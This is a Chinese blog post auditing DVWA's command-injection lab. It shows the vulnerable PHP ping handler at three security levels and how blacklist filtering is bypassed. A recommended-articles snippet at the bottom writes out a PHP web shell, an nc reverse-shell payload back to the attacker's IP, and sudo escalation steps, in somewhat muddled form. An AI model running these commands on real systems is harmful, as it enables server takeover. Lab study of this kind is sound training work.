php审计之——DVWA命令注入

最新推荐文章于 2023-03-07 20:05:57 发布
最新推荐文章于 2023-03-07 20:05:57 发布
阅读量556 收藏 2
点赞数 2
分类专栏: 代码审计 文章标签: 审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44632427/article/details/97109223
版权

命令注入

命令注入

命令:这个命令指的是操作系统的命令。
命令注入:就是通过web程序,在服务器上拼接系统的命令。有些网站对这些有需求,就开放了这些功能,但是,没有对命令进行严格的过滤,从而导致命令注入漏洞。

命令注入的条件

1、web应用程序调用可执行系统命令的函数。
2、执行系统命令函数或者函数的参数可控,如果它把你填入的参数限制得死死得,那也没办法用命令注入了。
3、参数可控,而且可拼接,一般命令注入的情况就是,前面语句固定的,后面需要我们自己去拼接语句,如果说遇到的情况不可拼接的话,那只能想别的办法了。

DVWA的命令注入漏洞

一、low安全级别

ok,关于ping命令我这里就不说了,从以前的Linux都继承下来了,现在windows上也有。从上图,我们可以看到,ping本地是能ping通的,我们就可以用命令连接符连接试试。
在这里插入图片描述
可以看到,我们通过&&连接两个命令,达到了注入的目的,在这里,我尝试了一下创建用户命令,不知道是权限不够还是什么情况,好像没有成功。我们先来看看服务器端的核心源码。

<?php 

if( isset( $_POST[ 'submit' ] ) ) { 

    $target = $_REQUEST[ 'ip' ]; 

    // Determine OS and execute the ping command. 
    if (stristr(php_uname('s'), 'Windows NT')) {  
     
        $cmd = shell_exec( 'ping  ' . $target ); 
        echo '<pre>'.$cmd.'</pre>'; 
         
    } else {  
     
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>'; 
         
    } 
     
} 
?>

它只是判断了一下操作系统,并没有对传入的ip参数进行过滤,直接传到后台执行了。这明显很致命。
二、medium安全级别
在这里插入图片描述
这里,我输入同样的命令后,它没有任何响应,看来它可能在low的基础上设置了过滤,我们再看能不能ping通IP。
在这里插入图片描述
能ping通,说明漏洞可能还在,它只是设置了过滤。ok,现在,我们换用其他命令连接符:
在这里插入图片描述
ok,我们换用其它命令连接符绕过它的过滤了,现在看看服务器端的核心源码。

<?php 

if( isset( $_POST[ 'submit'] ) ) { 

    $target = $_REQUEST[ 'ip' ]; 

    // Remove any of the charactars in the array (blacklist). 
    $substitutions = array( 
        '&&' => '', 
        ';' => '', 
    ); 

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); 
     
    // Determine OS and execute the ping command. 
    if (stristr(php_uname('s'), 'Windows NT')) {  
     
        $cmd = shell_exec( 'ping  ' . $target ); 
        echo '<pre>'.$cmd.'</pre>'; 
         
    } else {  
     
        $cmd = shell_exec( 'ping  -c 3 ' . $target ); 
        echo '<pre>'.$cmd.'</pre>'; 
         
    } 
} 

?>

很明显,代码量多了,多的部分多在哪儿?它在low的基础上,还做了简单的符号过滤把&&和;替换成空了。这样就出现语法错误,直接就把整个输入的命令过滤了。
三、high安全级别
我一般都这样,还是先ping一下某个IP,看这个功能有没有关,有时候,它一个功能不一定随时开着。
在这里插入图片描述
能ping通,看来有搞头,一般的升级,是在上一个的基础上升级的,我测试&&后无效,就直接测试&连接符。
在这里插入图片描述
它提示我,说我输入的IP不合法,无效。这次它过滤了&符,我们再看看它是否过滤了管道’|‘或者’||’。
在这里插入图片描述
ok,还是绕不过去,我都试过了,然后,我们看服务器后端源代码。

<?php 

if( isset( $_POST[ 'submit' ] ) ) { 

    $target = $_REQUEST["ip"]; 
     
    $target = stripslashes( $target ); 
     
     
    // Split the IP into 4 octects 
    $octet = explode(".", $target); 
     
    // Check IF each octet is an integer 
    if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4)  ) {
     
    // If all 4 octets are int's put the IP back together. 
    $target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3]; 
     
     
        // Determine OS and execute the ping command. 
        if (stristr(php_uname('s'), 'Windows NT')) {  
     
            $cmd = shell_exec( 'ping  ' . $target ); 
            echo '<pre>'.$cmd.'</pre>'; 
         
        } else {  
     
            $cmd = shell_exec( 'ping  -c 3 ' . $target ); 
            echo '<pre>'.$cmd.'</pre>'; 
         
        } 
     
    } 
     
    else { 
        echo '<pre>ERROR: You have entered an invalid IP</pre>'; 
    } 
     
     
} 

?>

这个它对IP进行了严格的筛选,它对IP的每一个部分都筛选了,只允许输入的IP中包含数字和点,做到这样的话,目前几乎是没有漏洞了。

总结这几个安全级别漏洞并审计

做到这,先小结一下,第一个是没有加过滤,这对于服务器来说危险程度是比较高的。第二个安全等级,主要是通过黑名单机制来进行限制,这种方法并不妥当。因为,黑名单中的字符毕竟有限,不能百分百保证能过滤所有危险。它只能在它黑名单的范围内起作用,在做命令过滤的时候,明显是不够专业的。

漏洞解决方法

现在,说一下解决办法,在DAVWA中,它是严格限制了IP的每一个元素,基本是没有漏洞了。然后,现在我也想不到啥好的办法,如果说用黑名单机制,还不如直接严格限制来的快,而且直接严格限制相比黑名单机制更加安全。如果说还能进一步完善的话,我觉得可以在后面的代码中记录一下输入特殊符号的用户IP,监视这个IP或者提交到waf的禁封策略。

人间酒中仙
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA之SQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
命令注入讲解ppt.pptx
08-10
PHP 应用程序中也有名为 PHP 命令注入攻击的漏洞——国内著名的 Web 应用程序 Discuz! 、 DedeCMS 等都曾经存在过该类型漏洞。无论哪种形式,它们的攻击原理都是一样的。即当恶意黑客进入一个有命令注入漏洞的网页时...
PHP代码审计DVWA[CSP Bypass]
weixin_54882883的博客
08-23 344
CSP 指的是为了缓解很大一部分潜在的跨站脚本(XSS) 问题,浏览器的扩展程序系统引入了内容安全策略(CSP)的一般概念。通过引入一些相当严格的策略使扩展程序在默认情况下更加安全,开发者可以创建并强制应用一些规则,管理网站允许加载的内容。CSP 以的机制对网站加载或执行的资源起作用,在网页中策略通过 HTTP 头信息或者 meta 元素定义。CSP 虽然提供了强大的安全保护,但是它也令 eval() 及相关函数被禁用、内嵌的 JavaScript 代码将不会执行、只能通过白名单来加载远程脚本。
PHP代码审计入门-DVWA靶场CSRF篇
身高两米不到的博客
11-16 1094
从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有基本的前端基础、简单的php+mysql后端基础、渗透知识和漏洞原理,文章跟随流沙前辈学习记录,看看曾经遥不可及的代码审计能不能慢慢啃下来。好的,文章内容代码不是重点,重点是逻辑和漏洞。然后产生疑惑, &dvwaSessionGrab函数为什么要加& ,百度一番看懂,吐槽一下:他喵的就不能用朴实无华的语言写出来,非得装杯。因为什么限制也做。
DVWA 命令注入
qq_41326328的博客
03-12 1121
DVWA 命令注入 实验 首先我们探讨一下 什么叫命令注入,指的是利用有验证过的恶意命令或代码,对网站或者服务器进行渗透攻击。 注入有很多种,并不仅仅是SQL注入。比如: 命令注入(Command injection) Eval注入(Eval injection) 客户端脚本攻击(Script insertion) 跨网站脚本攻击(Cross Site Scripting,XSS) SQL注入...
N3 DVWA Command Injection(命令注入)
尐猴子君ii的博客
08-14 493
一.基础知识 1.ping命令 ping ip地址 :测试该ip是否在线 ping -n 2 ip地址:Windows系统,发送两次ping包命令。 ping -c 2 ip地址:Linux系统,发送两次ping包命令。 ping 127.0.0.1 :测试本地tcp/ip服务是否正常工作 2.ipconfig命令 ipconfig:Windows系统查看本机ip的命令 ifconfig:Linux系统查看本机ip的命令 3.net user net user 用户名 密码 /add :Windows系统添
DVWA------命令注入
qq_42527761的博客
08-07 245
简介工具测试方法Low等级Medium等级High等级 简介 命令注入是通过在应用程序中注入执行宿主操作系统的命令,来达到破坏目的的一种攻击方式,由应用程序传递操作系统命令会赋有和应用一样的权限。 命令注入攻击漏洞PHP应用程序中常见的漏洞之一。 命令注入和代码注入不同,代码注入的目的在于将外部代码注入应用程序本身,并随程序执行命令攻击的对象是服务器的宿主机。 工具 firefox浏览器 测试方法 Low等级 将DVWA安全等级调为Low等级 Low等级对输入并有进行任何的过滤。 在输入.
PHP-dvwa-高难度代码审计
10-08
PHP-dvwa-高难度代码审计
135-PHP、Apache环境中部署DVWA
09-08
DVWA 提供了多种类型的漏洞,例如 SQL 注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等,让用户可以在安全的环境中实践和学习 Web 应用程序安全漏洞的检测和防御。 环境准备 在部署 DVWA 之前,需要先安装 PHP 和 ...
DVWA下的SQL注入
07-25
SQL
DVWA-命令注入
weixin_51513059的博客
11-01 5081
DVWA-命令注入通关 命令注入相関概念及命令注入的防御
DVWA搭建
xiao_he0123的博客
01-06 1100
一、前提条件: 1.phpstudy 官网:https://www.xp.cn 2.DVWA 官网:DVWA - Damn Vulnerable Web Application 二、搭建过程: 2.1 phpstudy的搭建 开启Apache2.4.39和MySQL5.7.26俩个服务 浏览器访问自己的ip地址(一般为127.0.0.1),出现下图,则phpstudy搭建完成 2.2 MySQL环境配置(若自身电脑并未安装的话在进行安装) 检查是否安装:开始->运行-.
dvwa搭建
qq_53065516的博客
03-14 219
sal注入:当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。 攻击者通过构造不同的sql语句来实现对数据库的任意操作。 数据库类型:sql:oracle、MySQL、mssql、access、sqlite、postgersqlnosql:mongodb、redis dvwa搭建:下载小皮与dvwadvwa解压到www目录下,进入站点127.0.0.1。修改一个PHP文件后进入,在访问http://127.0.0.1/dvwa/setup.php的时候会报错,这时需要改ini配置以及进入
DVWA第二关 之命令注入
qq_43772826的博客
06-11 676
命令注入(Command Injection),是指在某些需要输入数据的位置,还构造了恶意的代码破坏了原先的语句结构。而系统缺少有效的过滤,最终达到破坏数据、信息泄露甚至掌控电脑的目的。许多内容管理系统CMS存在命令注入漏洞。 解决乱码问题 在文本框中输入"127.0.0.1”后结果显示为乱码,解决此问题的方法:在DVWA-master\dvwa\includes目录下找到dvwaPage.inc.php文件中所有的”charset=utf-8”,修改”charset=gb2312”,即可。 LOW级别 1
DVWA里的其他用户登陆账号
qq_42133828的博客
11-20 1807
DVWA中默认的五个用户名登陆 : 1:admin/password 2:gordonb/abc123 3:1337/charley 4:pablo/letmein 5:smithy/password                                      ...
PHP代码审计--Challenge6
D-R0s1的博客
02-12 1149
题目代码 <?php if(isset($_REQUEST[ 'ip' ])) { $target = trim($_REQUEST[ 'ip' ]); $substitutions = array( '&' => '', ';' => '', '|' => '', '-' => '', '$' => '', '(' => '', ')' =&gt...
DVWA靶机通关攻略第二关——命令注入
小飞飞的博客
03-07 680
DVWA靶机命令注入详细教学
Ubuntu 新建用户 Shell 命令行显示异常
u011700186的博客
06-28 1640
可以从 /etc/passwd 中查看账号的 Shell 命令,从 /etc/passwd 中可以看到默认创建的用户使用的是 /bin/sh,而 root 用户使用的是 /bin/bash。这个问题是由于新创建的用户默认使用的是 /bin/sh 而不是 /bin/bash,两种不同规范的 Shell 不一样。使用 root 用户编辑 /etc/passwd 文件,将对应用户的 Shell 改为 /bin/bash,并保存退出。2、/bin/sh 与 /bin/bash 的区别。1、useradd 用法。
DVWA-命令注入 全级别教程
weixin_44716769的博客
09-08 5389
命令注入 实验准备 在做DVWA攻防练习时发现,注入命令返回的信息竟然是乱码,猜测可能是因为DVWA是在windows下部署的原因,底层系统是中文GBK编码所致。 在输入127.0.0.1测试时,发现如下乱码 在PHPstudy的安装目录下(每个人不同,本例中)目录下,有个dvwaPage.inc.php文件,打开文件在277行修改,将UTF-8改为GBK或者GB2312即可。 重新输入命令,不再乱码 Low等级 查看源码 stristr(string,search,before_search) s
dvwa命令注入提权
最新发布
12-05
根据提供的引用内容,dvwa命令注入提权的思路如下: 1.尝试写入一个php文件,可以使用如下命令: ``` echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/cmd.php ``` 这个命令会在/var/www/html/目录下写入一个名为cmd.php的文件,其中的system($_GET["cmd"])可以执行GET请求中的cmd参数所对应的命令。 2.连接菜刀,使用如下命令: ``` nc -nvlp 4444 ``` 这个命令会在本地监听4444端口,等待菜刀连接。 3.在DVWA命令注入页面中,输入如下命令: ``` & cmd=nc -e /bin/bash 你的IP地址 4444 & ``` 其中,你的IP地址需要替换成你本地的IP地址。这个命令会在目标机器上执行nc命令,将shell连接回你的本地机器。 4.在菜刀中连接目标机器,即可获得一个shell,使用whoami命令查看当前用户,如果是www-data,则可以使用如下命令提权: ``` sudo -l ``` 这个命令会列出当前用户可以使用sudo命令执行命令。 5.如果当前用户可以使用sudo执行任意命令,则可以使用如下命令提权: ``` sudo /bin/bash ``` 这个命令会以root权限打开一个新的shell。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值